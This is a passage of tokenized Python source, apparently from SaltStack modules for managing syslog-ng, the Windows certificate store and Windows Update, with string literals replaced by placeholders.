build ( ) <EOL> _INDENT = '<STR_LIT>' <EOL> return text_repr <EOL> def config ( name , <EOL> config , <EOL> write = True ) : <EOL> '''<STR_LIT>''' <EOL> _build_config_tree ( name , config ) <EOL> configs = _render_configuration ( ) <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' . format ( <EOL> configs , <EOL> __SYSLOG_NG_CONFIG_FILE <EOL> ) <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> succ = write <EOL> if write : <EOL> succ = _write_config ( config = configs ) <EOL> return _format_state_result ( name , result = succ , <EOL> changes = { '<STR_LIT>' : configs , '<STR_LIT>' : '<STR_LIT>' } ) <EOL> def set_binary_path ( name ) : <EOL> '''<STR_LIT>''' <EOL> global __SYSLOG_NG_BINARY_PATH <EOL> old = __SYSLOG_NG_BINARY_PATH <EOL> __SYSLOG_NG_BINARY_PATH = name <EOL> changes = _format_changes ( old , name ) <EOL> return _format_state_result ( name , result = True , changes = changes ) <EOL> def set_config_file ( name ) : <EOL> '''<STR_LIT>''' <EOL> global __SYSLOG_NG_CONFIG_FILE <EOL> old = __SYSLOG_NG_CONFIG_FILE <EOL> __SYSLOG_NG_CONFIG_FILE = name <EOL> changes = _format_changes ( old , name ) <EOL> return _format_state_result ( name , result = True , changes = changes ) <EOL> def get_config_file ( ) : <EOL> '''<STR_LIT>''' <EOL> return __SYSLOG_NG_CONFIG_FILE <EOL> def _run_command ( cmd , options = ( ) ) : <EOL> '''<STR_LIT>''' <EOL> params = [ cmd ] <EOL> params . 
extend ( options ) <EOL> return __salt__ [ '<STR_LIT>' ] ( params , python_shell = False ) <EOL> def _determine_config_version ( syslog_ng_sbin_dir ) : <EOL> ret = version ( syslog_ng_sbin_dir ) <EOL> full_version = ret [ '<STR_LIT>' ] <EOL> dot_count = <NUM_LIT:0> <EOL> for idx , part in enumerate ( full_version ) : <EOL> if part == '<STR_LIT:.>' : <EOL> dot_count = dot_count + <NUM_LIT:1> <EOL> if dot_count == <NUM_LIT:2> : <EOL> return full_version [ <NUM_LIT:0> : idx ] <EOL> return full_version [ : <NUM_LIT:3> ] <EOL> def set_parameters ( version = None , <EOL> binary_path = None , <EOL> config_file = None , <EOL> * args , <EOL> ** kwargs ) : <EOL> '''<STR_LIT>''' <EOL> if binary_path : <EOL> set_binary_path ( binary_path ) <EOL> if config_file : <EOL> set_config_file ( config_file ) <EOL> if version : <EOL> version = _determine_config_version ( __SYSLOG_NG_BINARY_PATH ) <EOL> write_version ( version ) <EOL> return _format_return_data ( <NUM_LIT:0> ) <EOL> def _add_to_path_envvar ( directory ) : <EOL> '''<STR_LIT>''' <EOL> orig_path = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if directory : <EOL> if not os . path . isdir ( directory ) : <EOL> log . error ( '<STR_LIT>' ) <EOL> os . environ [ '<STR_LIT>' ] = '<STR_LIT>' . format ( orig_path , <EOL> os . pathsep , <EOL> directory ) <EOL> return orig_path <EOL> def _restore_path_envvar ( original ) : <EOL> '''<STR_LIT>''' <EOL> if original : <EOL> os . environ [ '<STR_LIT>' ] = original <EOL> def _run_command_in_extended_path ( syslog_ng_sbin_dir , command , params ) : <EOL> '''<STR_LIT>''' <EOL> orig_path = _add_to_path_envvar ( syslog_ng_sbin_dir ) <EOL> if not salt . utils . which ( command ) : <EOL> error_message = ( <EOL> '<STR_LIT>' <EOL> . format ( command ) <EOL> ) <EOL> log . 
error ( error_message ) <EOL> _restore_path_envvar ( orig_path ) <EOL> raise CommandExecutionError ( error_message ) <EOL> ret = _run_command ( command , options = params ) <EOL> _restore_path_envvar ( orig_path ) <EOL> return ret <EOL> def _format_return_data ( retcode , stdout = None , stderr = None ) : <EOL> '''<STR_LIT>''' <EOL> ret = { '<STR_LIT>' : retcode } <EOL> if stdout is not None : <EOL> ret [ '<STR_LIT>' ] = stdout <EOL> if stderr is not None : <EOL> ret [ '<STR_LIT>' ] = stderr <EOL> return ret <EOL> def config_test ( syslog_ng_sbin_dir = None , cfgfile = None ) : <EOL> '''<STR_LIT>''' <EOL> params = [ '<STR_LIT>' ] <EOL> if cfgfile : <EOL> params . append ( '<STR_LIT>' . format ( cfgfile ) ) <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> params ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> retcode = ret . get ( '<STR_LIT>' , - <NUM_LIT:1> ) <EOL> stderr = ret . get ( '<STR_LIT>' , None ) <EOL> stdout = ret . get ( '<STR_LIT>' , None ) <EOL> return _format_return_data ( retcode , stdout , stderr ) <EOL> def version ( syslog_ng_sbin_dir = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , ) ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> stderr = ret [ '<STR_LIT>' ] , <EOL> stdout = ret [ '<STR_LIT>' ] ) <EOL> lines = ret [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> version_line_index = <NUM_LIT:0> <EOL> version_column_index = <NUM_LIT:1> <EOL> line = lines [ version_line_index ] . 
split ( ) [ version_column_index ] <EOL> return _format_return_data ( <NUM_LIT:0> , stdout = line ) <EOL> def modules ( syslog_ng_sbin_dir = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , ) ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> if ret [ '<STR_LIT>' ] != <NUM_LIT:0> : <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> ret . get ( '<STR_LIT>' ) , <EOL> ret . get ( '<STR_LIT>' ) ) <EOL> lines = ret [ '<STR_LIT>' ] . split ( '<STR_LIT:\n>' ) <EOL> for line in lines : <EOL> if line . startswith ( '<STR_LIT>' ) : <EOL> label , installed_modules = line . split ( ) <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> stdout = installed_modules ) <EOL> return _format_return_data ( - <NUM_LIT:1> , stderr = '<STR_LIT>' ) <EOL> def stats ( syslog_ng_sbin_dir = None ) : <EOL> '''<STR_LIT>''' <EOL> try : <EOL> ret = _run_command_in_extended_path ( syslog_ng_sbin_dir , <EOL> '<STR_LIT>' , <EOL> ( '<STR_LIT>' , ) ) <EOL> except CommandExecutionError as err : <EOL> return _format_return_data ( retcode = - <NUM_LIT:1> , stderr = str ( err ) ) <EOL> return _format_return_data ( ret [ '<STR_LIT>' ] , <EOL> ret . get ( '<STR_LIT>' ) , <EOL> ret . get ( '<STR_LIT>' ) ) <EOL> def _format_changes ( old = '<STR_LIT>' , new = '<STR_LIT>' ) : <EOL> return { '<STR_LIT>' : old , '<STR_LIT>' : new } <EOL> def _format_state_result ( name , result , changes = None , comment = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> if changes is None : <EOL> changes = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> return { '<STR_LIT:name>' : name , '<STR_LIT:result>' : result , <EOL> '<STR_LIT>' : changes , '<STR_LIT>' : comment } <EOL> def _add_cli_param ( params , key , value ) : <EOL> '''<STR_LIT>''' <EOL> if value is not None : <EOL> params . append ( '<STR_LIT>' . 
format ( key , value ) ) <EOL> def _add_boolean_cli_param ( params , key , value ) : <EOL> '''<STR_LIT>''' <EOL> if value is True : <EOL> params . append ( '<STR_LIT>' . format ( key ) ) <EOL> def stop ( name = None ) : <EOL> '''<STR_LIT>''' <EOL> pids = __salt__ [ '<STR_LIT>' ] ( pattern = '<STR_LIT>' ) <EOL> if pids is None or len ( pids ) == <NUM_LIT:0> : <EOL> return _format_state_result ( name , <EOL> result = False , <EOL> comment = '<STR_LIT>' ) <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> res = __salt__ [ '<STR_LIT>' ] ( '<STR_LIT>' ) <EOL> killed_pids = res [ '<STR_LIT>' ] <EOL> if killed_pids == pids : <EOL> changes = { '<STR_LIT>' : killed_pids , '<STR_LIT>' : [ ] } <EOL> return _format_state_result ( name , result = True , changes = changes ) <EOL> else : <EOL> return _format_state_result ( name , result = False ) <EOL> def start ( name = None , <EOL> user = None , <EOL> group = None , <EOL> chroot = None , <EOL> caps = None , <EOL> no_caps = False , <EOL> pidfile = None , <EOL> enable_core = False , <EOL> fd_limit = None , <EOL> verbose = False , <EOL> debug = False , <EOL> trace = False , <EOL> yydebug = False , <EOL> persist_file = None , <EOL> control = None , <EOL> worker_threads = None ) : <EOL> '''<STR_LIT>''' <EOL> params = [ ] <EOL> _add_cli_param ( params , '<STR_LIT:user>' , user ) <EOL> _add_cli_param ( params , '<STR_LIT>' , group ) <EOL> _add_cli_param ( params , '<STR_LIT>' , chroot ) <EOL> _add_cli_param ( params , '<STR_LIT>' , caps ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , no_caps ) <EOL> _add_cli_param ( params , '<STR_LIT>' , pidfile ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , enable_core ) <EOL> _add_cli_param ( params , '<STR_LIT>' , fd_limit ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , verbose ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , debug ) <EOL> 
_add_boolean_cli_param ( params , '<STR_LIT>' , trace ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , yydebug ) <EOL> _add_cli_param ( params , '<STR_LIT>' , __SYSLOG_NG_CONFIG_FILE ) <EOL> _add_boolean_cli_param ( params , '<STR_LIT>' , persist_file ) <EOL> _add_cli_param ( params , '<STR_LIT>' , control ) <EOL> _add_cli_param ( params , '<STR_LIT>' , worker_threads ) <EOL> if __SYSLOG_NG_BINARY_PATH : <EOL> syslog_ng_binary = os . path . join ( __SYSLOG_NG_BINARY_PATH , '<STR_LIT>' ) <EOL> command = [ syslog_ng_binary ] + params <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' . format ( command ) <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> else : <EOL> command = [ '<STR_LIT>' ] + params <EOL> if __opts__ . get ( '<STR_LIT:test>' , False ) : <EOL> comment = '<STR_LIT>' . format ( command ) <EOL> return _format_state_result ( name , result = None , comment = comment ) <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> if result [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> succ = True <EOL> else : <EOL> succ = False <EOL> return _format_state_result ( <EOL> name , result = succ , changes = { '<STR_LIT>' : '<STR_LIT:U+0020>' . join ( command ) , '<STR_LIT>' : '<STR_LIT>' } <EOL> ) <EOL> def reload_ ( name ) : <EOL> '''<STR_LIT>''' <EOL> if __SYSLOG_NG_BINARY_PATH : <EOL> syslog_ng_ctl_binary = os . path . 
join ( __SYSLOG_NG_BINARY_PATH , <EOL> '<STR_LIT>' ) <EOL> command = [ syslog_ng_ctl_binary , '<STR_LIT>' ] <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> else : <EOL> command = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> result = __salt__ [ '<STR_LIT>' ] ( command , python_shell = False ) <EOL> succ = True if result [ '<STR_LIT>' ] == <NUM_LIT:0> else False <EOL> return _format_state_result ( name , result = succ , comment = result [ '<STR_LIT>' ] ) <EOL> def _format_generated_config_header ( ) : <EOL> '''<STR_LIT>''' <EOL> now = time . strftime ( '<STR_LIT>' ) <EOL> return __SALT_GENERATED_CONFIG_HEADER . format ( now ) <EOL> def write_config ( config , newlines = <NUM_LIT:2> ) : <EOL> '''<STR_LIT>''' <EOL> succ = _write_config ( config , newlines ) <EOL> changes = _format_changes ( new = config ) <EOL> return _format_state_result ( name = '<STR_LIT>' , result = succ , changes = changes ) <EOL> def _write_config ( config , newlines = <NUM_LIT:2> ) : <EOL> '''<STR_LIT>''' <EOL> text = config <EOL> if isinstance ( config , dict ) and len ( list ( list ( config . keys ( ) ) ) ) == <NUM_LIT:1> : <EOL> key = next ( six . iterkeys ( config ) ) <EOL> text = config [ key ] <EOL> try : <EOL> with salt . utils . fopen ( __SYSLOG_NG_CONFIG_FILE , '<STR_LIT:a>' ) as fha : <EOL> fha . write ( text ) <EOL> for _ in range ( <NUM_LIT:0> , newlines ) : <EOL> fha . write ( os . linesep ) <EOL> return True <EOL> except Exception as err : <EOL> log . error ( str ( err ) ) <EOL> return False <EOL> def write_version ( name ) : <EOL> '''<STR_LIT>''' <EOL> line = '<STR_LIT>' . format ( name ) <EOL> try : <EOL> if os . path . exists ( __SYSLOG_NG_CONFIG_FILE ) : <EOL> log . debug ( <EOL> '<STR_LIT>' . format ( <EOL> __SYSLOG_NG_CONFIG_FILE <EOL> ) <EOL> ) <EOL> os . remove ( __SYSLOG_NG_CONFIG_FILE ) <EOL> log . 
debug ( '<STR_LIT>' ) <EOL> header = _format_generated_config_header ( ) <EOL> _write_config ( config = header , newlines = <NUM_LIT:1> ) <EOL> _write_config ( config = line , newlines = <NUM_LIT:2> ) <EOL> return _format_state_result ( name , result = True ) <EOL> except OSError as err : <EOL> log . error ( <EOL> '<STR_LIT>' <EOL> . format ( __SYSLOG_NG_CONFIG_FILE , str ( err ) ) <EOL> ) <EOL> return _format_state_result ( name , result = False ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import re <EOL> import logging <EOL> import salt . utils <EOL> log = logging . getLogger ( __name__ ) <EOL> __virtualname__ = "<STR_LIT>" <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_windows ( ) : <EOL> return __virtualname__ <EOL> return False <EOL> def get_cert_serial ( cert_file ) : <EOL> '''<STR_LIT>''' <EOL> cmd = "<STR_LIT>" . format ( cert_file ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> matches = re . search ( r"<STR_LIT>" , out ) <EOL> if matches is not None : <EOL> return matches . groups ( ) [ <NUM_LIT:0> ] . strip ( ) <EOL> else : <EOL> return None <EOL> def get_stored_cert_serials ( store ) : <EOL> '''<STR_LIT>''' <EOL> cmd = "<STR_LIT>" . format ( store ) <EOL> out = __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> matches = re . findall ( r"<STR_LIT>" , out ) <EOL> return matches <EOL> def add_store ( source , store , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> cert_file = __salt__ [ '<STR_LIT>' ] ( source , saltenv ) <EOL> cmd = "<STR_LIT>" . format ( store , cert_file ) <EOL> return __salt__ [ '<STR_LIT>' ] ( cmd ) <EOL> def del_store ( source , store , saltenv = '<STR_LIT>' ) : <EOL> '''<STR_LIT>''' <EOL> cert_file = __salt__ [ '<STR_LIT>' ] ( source , saltenv ) <EOL> serial = get_cert_serial ( cert_file ) <EOL> cmd = "<STR_LIT>" . format ( store , serial ) <EOL> return __salt__ [ '<STR_LIT>' ] ( cmd ) </s>
<s> '''<STR_LIT>''' <EOL> from __future__ import absolute_import <EOL> import logging <EOL> from salt . ext . six . moves import range <EOL> try : <EOL> import win32com . client <EOL> import pythoncom <EOL> HAS_DEPENDENCIES = True <EOL> except ImportError : <EOL> HAS_DEPENDENCIES = False <EOL> import salt . utils <EOL> import salt . utils . locales <EOL> log = logging . getLogger ( __name__ ) <EOL> def __virtual__ ( ) : <EOL> '''<STR_LIT>''' <EOL> if salt . utils . is_windows ( ) and HAS_DEPENDENCIES : <EOL> return True <EOL> return ( False , "<STR_LIT>" ) <EOL> def _gather_update_categories ( updateCollection ) : <EOL> '''<STR_LIT>''' <EOL> categories = [ ] <EOL> for i in range ( updateCollection . Count ) : <EOL> update = updateCollection . Item ( i ) <EOL> for j in range ( update . Categories . Count ) : <EOL> name = update . Categories . Item ( j ) . Name <EOL> if name not in categories : <EOL> log . debug ( '<STR_LIT>' . format ( name ) ) <EOL> categories . append ( name ) <EOL> return categories <EOL> class PyWinUpdater ( object ) : <EOL> def __init__ ( self , categories = None , skipUI = True , skipDownloaded = False , <EOL> skipInstalled = True , skipReboot = False , skipPresent = False , <EOL> skipSoftwareUpdates = False , skipDriverUpdates = False , skipHidden = True ) : <EOL> log . debug ( '<STR_LIT>' ) <EOL> pythoncom . CoInitialize ( ) <EOL> self . skipUI = skipUI <EOL> self . skipDownloaded = skipDownloaded <EOL> self . skipInstalled = skipInstalled <EOL> self . skipReboot = skipReboot <EOL> self . skipPresent = skipPresent <EOL> self . skipHidden = skipHidden <EOL> self . skipSoftwareUpdates = skipSoftwareUpdates <EOL> self . skipDriverUpdates = skipDriverUpdates <EOL> self . categories = categories <EOL> self . foundCategories = [ ] <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . update_session = win32com . client . Dispatch ( '<STR_LIT>' ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . win_searcher = self . update_session . 
CreateUpdateSearcher ( ) <EOL> self . download_collection = win32com . client . Dispatch ( '<STR_LIT>' ) <EOL> self . install_collection = win32com . client . Dispatch ( '<STR_LIT>' ) <EOL> self . win_downloader = self . update_session . CreateUpdateDownloader ( ) <EOL> self . win_downloader . Updates = self . download_collection <EOL> self . win_installer = self . update_session . CreateUpdateInstaller ( ) <EOL> self . win_installer . Updates = self . install_collection <EOL> self . download_results = None <EOL> self . install_results = None <EOL> self . search_results = None <EOL> def Search ( self , searchString ) : <EOL> try : <EOL> log . debug ( '<STR_LIT>' . format ( searchString ) ) <EOL> self . search_results = self . win_searcher . Search ( searchString ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> log . debug ( '<STR_LIT>' . format ( <EOL> self . search_results . Updates . Count ) ) <EOL> try : <EOL> for update in self . search_results . Updates : <EOL> if update . InstallationBehavior . CanRequestUserInput : <EOL> log . debug ( <STR_LIT> . format ( update . title ) ) <EOL> continue <EOL> if self . skipDownloaded and update . IsDownloaded : <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> continue <EOL> for category in update . Categories : <EOL> if self . categories is None or category . Name in self . categories : <EOL> self . download_collection . Add ( update ) <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> break <EOL> log . debug ( '<STR_LIT>' ) <EOL> self . foundCategories = _gather_update_categories ( self . download_collection ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( self . foundCategories ) ) ) <EOL> return True <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . 
format ( exc ) ) <EOL> return exc <EOL> def AutoSearch ( self ) : <EOL> '''<STR_LIT>''' <EOL> search_string = '<STR_LIT>' <EOL> searchParams = [ ] <EOL> if self . skipInstalled : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> if self . skipHidden : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> if self . skipReboot : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> if self . skipPresent : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> else : <EOL> searchParams . append ( '<STR_LIT>' ) <EOL> for i in searchParams : <EOL> search_string += '<STR_LIT>' . format ( i ) <EOL> if not self . skipSoftwareUpdates and not self . skipDriverUpdates : <EOL> search_string += '<STR_LIT>' <EOL> elif not self . skipSoftwareUpdates : <EOL> search_string += '<STR_LIT>' <EOL> elif not self . skipDriverUpdates : <EOL> search_string += '<STR_LIT>' <EOL> else : <EOL> return False <EOL> log . debug ( '<STR_LIT>' . format ( search_string ) ) <EOL> return self . Search ( search_string ) <EOL> def Download ( self ) : <EOL> try : <EOL> if self . download_collection . Count != <NUM_LIT:0> : <EOL> self . download_results = self . win_downloader . Download ( ) <EOL> else : <EOL> log . debug ( '<STR_LIT>' ) <EOL> return True <EOL> except Exception as exc : <EOL> log . debug ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> def Install ( self ) : <EOL> try : <EOL> for update in self . search_results . Updates : <EOL> if update . IsDownloaded : <EOL> self . install_collection . Add ( update ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> try : <EOL> for update in self . search_results . Updates : <EOL> if not update . EulaAccepted : <EOL> log . debug ( u'<STR_LIT>' . format ( update . Title ) ) <EOL> update . 
AcceptEula ( ) <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> if self . install_collection . Count != <NUM_LIT:0> : <EOL> log . debug ( '<STR_LIT>' ) <EOL> try : <EOL> self . install_results = self . win_installer . Install ( ) <EOL> log . info ( '<STR_LIT>' ) <EOL> return True <EOL> except Exception as exc : <EOL> log . info ( '<STR_LIT>' . format ( exc ) ) <EOL> return exc <EOL> else : <EOL> log . info ( '<STR_LIT>' ) <EOL> return True <EOL> def GetInstallationResults ( self ) : <EOL> '''<STR_LIT>''' <EOL> log . debug ( '<STR_LIT>' . format ( self . install_collection . Count ) ) <EOL> if self . install_collection . Count == <NUM_LIT:0> : <EOL> return { } <EOL> updates = [ ] <EOL> log . debug ( '<STR_LIT>' ) <EOL> for i in range ( self . install_collection . Count ) : <EOL> updates . append ( '<STR_LIT>' . format ( <EOL> self . install_results . GetUpdateResult ( i ) . ResultCode , <EOL> self . install_collection . Item ( i ) . Title ) ) <EOL> log . debug ( '<STR_LIT>' ) <EOL> results = { } <EOL> for i , update in enumerate ( updates ) : <EOL> results [ '<STR_LIT>' . format ( i ) ] = update <EOL> log . debug ( '<STR_LIT>' ) <EOL> return results <EOL> def GetInstallationResultsPretty ( self ) : <EOL> '''<STR_LIT>''' <EOL> updates = self . GetInstallationResults ( ) <EOL> ret = '<STR_LIT>' <EOL> for i in updates : <EOL> ret += '<STR_LIT>' . format ( updates [ i ] ) <EOL> return ret <EOL> def GetDownloadResults ( self ) : <EOL> updates = [ ] <EOL> for i in range ( self . download_collection . Count ) : <EOL> updates . append ( '<STR_LIT>' . format ( <EOL> str ( self . download_results . GetUpdateResult ( i ) . ResultCode ) , <EOL> str ( self . download_collection . Item ( i ) . Title ) ) ) <EOL> results = { } <EOL> for i , update in enumerate ( updates ) : <EOL> results [ '<STR_LIT>' . format ( i ) ] = update <EOL> return results <EOL> def GetSearchResultsVerbose ( self ) : <EOL> updates = [ ] <EOL> log . 
debug ( '<STR_LIT>' . format ( <EOL> self . download_collection . count ) ) <EOL> for update in self . download_collection : <EOL> if update . InstallationBehavior . CanRequestUserInput : <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> continue <EOL> update_com_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> simple_enums = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> update_dict = { } <EOL> for f in update_com_fields : <EOL> v = getattr ( update , f ) <EOL> if not any ( [ isinstance ( v , bool ) , isinstance ( v , str ) ] ) : <EOL> if f in simple_enums : <EOL> v = [ x for x in v ] <EOL> elif f == '<STR_LIT>' : <EOL> v = [ { '<STR_LIT:Name>' : cat . Name , '<STR_LIT>' : cat . Description } for cat in v ] <EOL> elif f == '<STR_LIT>' : <EOL> continue <EOL> elif f == '<STR_LIT>' : <EOL> v = { '<STR_LIT>' : v . RevisionNumber , <EOL> '<STR_LIT>' : v . UpdateID } <EOL> update_dict [ f ] = v <EOL> updates . append ( update_dict ) <EOL> log . debug ( u'<STR_LIT>' . format ( update . title ) ) <EOL> return updates <EOL> def GetSearchResults ( self , fields = None ) : <EOL> """<STR_LIT>""" <EOL> updates_verbose = self . GetSearchResultsVerbose ( ) <EOL> if fields is not None : <EOL> updates = [ dict ( ( k , v ) for k , v in update . items ( ) if k in fields ) <EOL> for update in updates_verbose ] <EOL> return updates <EOL> return [ update [ '<STR_LIT>' ] for update in updates_verbose ] <EOL> def SetCategories ( self , categories ) : <EOL> self . categories = categories <EOL> def GetCategories ( self ) : <EOL> return self . categories <EOL> def GetAvailableCategories ( self ) : <EOL> return self . foundCategories <EOL> def SetSkips ( self , skips ) : <EOL> if skips : <EOL> for i in skips : <EOL> value = i [ next ( i . iterkeys ( ) ) ] <EOL> skip = next ( i . 
iterkeys ( ) ) <EOL> self . SetSkip ( skip , value ) <EOL> log . debug ( '<STR_LIT>' . format ( skip , value ) ) <EOL> def SetSkip ( self , skip , state ) : <EOL> if skip == '<STR_LIT>' : <EOL> self . skipUI = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipDownloaded = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipInstalled = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipReboot = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipPresent = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipHidden = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipSoftwareUpdates = state <EOL> elif skip == '<STR_LIT>' : <EOL> self . skipDriverUpdates = state <EOL> log . debug ( '<STR_LIT>' . format ( <EOL> self . skipUI , self . skipDownloaded , self . skipInstalled , self . skipReboot , <EOL> self . skipPresent , self . skipHidden , self . skipSoftwareUpdates , self . skipDriverUpdates ) ) <EOL> def __str__ ( self ) : <EOL> results = '<STR_LIT>' . format ( <EOL> self . download_collection . count ) <EOL> for category in self . foundCategories : <EOL> count = <NUM_LIT:0> <EOL> for update in self . download_collection : <EOL> for cat in update . Categories : <EOL> if category == cat . Name : <EOL> count += <NUM_LIT:1> <EOL> results += '<STR_LIT>' . format ( category , count ) <EOL> return results <EOL> def _search ( quidditch , retries = <NUM_LIT:5> ) : <EOL> '''<STR_LIT>''' <EOL> passed = False <EOL> clean = True <EOL> comment = '<STR_LIT>' <EOL> while not passed : <EOL> log . debug ( '<STR_LIT>' . format ( retries ) ) <EOL> passed = quidditch . AutoSearch ( ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( passed ) ) ) <EOL> if isinstance ( passed , Exception ) : <EOL> clean = False <EOL> comment += '<STR_LIT>' . format ( passed ) <EOL> retries -= <NUM_LIT:1> <EOL> if retries : <EOL> comment += '<STR_LIT>' . 
format ( str ( retries ) ) <EOL> else : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> passed = False <EOL> if clean : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> def _download ( quidditch , retries = <NUM_LIT:5> ) : <EOL> '''<STR_LIT>''' <EOL> passed = False <EOL> clean = True <EOL> comment = '<STR_LIT>' <EOL> while not passed : <EOL> log . debug ( '<STR_LIT>' . format ( str ( retries ) ) ) <EOL> passed = quidditch . Download ( ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( passed ) ) ) <EOL> if isinstance ( passed , Exception ) : <EOL> clean = False <EOL> comment += '<STR_LIT>' . format ( str ( passed ) ) <EOL> retries -= <NUM_LIT:1> <EOL> if retries : <EOL> comment += '<STR_LIT>' . format ( str ( retries ) ) <EOL> passed = False <EOL> else : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , False , retries ) <EOL> if clean : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> def _install ( quidditch , retries = <NUM_LIT:5> ) : <EOL> '''<STR_LIT>''' <EOL> passed = False <EOL> clean = True <EOL> comment = '<STR_LIT>' <EOL> while not passed : <EOL> log . debug ( '<STR_LIT>' . format ( str ( quidditch . install_collection . Count ) ) ) <EOL> log . debug ( '<STR_LIT>' . format ( str ( retries ) ) ) <EOL> passed = quidditch . Install ( ) <EOL> log . info ( '<STR_LIT>' . format ( str ( passed ) ) ) <EOL> if isinstance ( passed , Exception ) : <EOL> clean = False <EOL> comment += '<STR_LIT>' . format ( str ( passed ) ) <EOL> retries -= <NUM_LIT:1> <EOL> if retries : <EOL> comment += '<STR_LIT>' . format ( str ( retries ) ) <EOL> passed = False <EOL> else : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , False , retries ) <EOL> if clean : <EOL> comment += '<STR_LIT>' <EOL> return ( comment , True , retries ) <EOL> def list_updates ( verbose = False , fields = None , skips = None , retries = <NUM_LIT:5> , categories = None ) : <EOL> '''<STR_LIT>''' <EOL> log . 
